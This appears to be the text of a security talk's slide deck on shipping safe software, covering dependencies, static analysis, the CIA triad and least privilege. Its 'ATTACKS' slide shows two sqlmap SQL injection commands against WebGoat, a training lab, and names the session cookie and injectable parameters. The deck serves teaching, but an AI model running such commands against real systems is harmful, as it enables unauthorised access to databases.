Charanjit Singh
I like computers.
@bitspook
YOU
SHIP
Dependencies
Static Analysis
CIA
Triad
Confidentiality
Integrity
Property of being accessible and usable on demand by an authorized entity.
Availability
Least Privilege Principle
ATTACKS
sqlmap \
--cookie JSESSIONID=9A59D520718559C9DD5C0E1BA5AC3E2E \
--url http://webgoat:8080/WebGoat/SqlInjection/assignment5b \
--data login_count=1\&userid=1 \
-p userid
sqlmap \
--cookie JSESSIONID=9A59D520718559C9DD5C0E1BA5AC3E2E \
--url http://webgoat:8080/WebGoat/SqlInjection/attack9 \
--data name=Smith\&auth_tan=3SL99A \
-p name
SHIP
1. Practice
2. Practice
3. Continuous Scanning
Getting Serious
By Charanjit Singh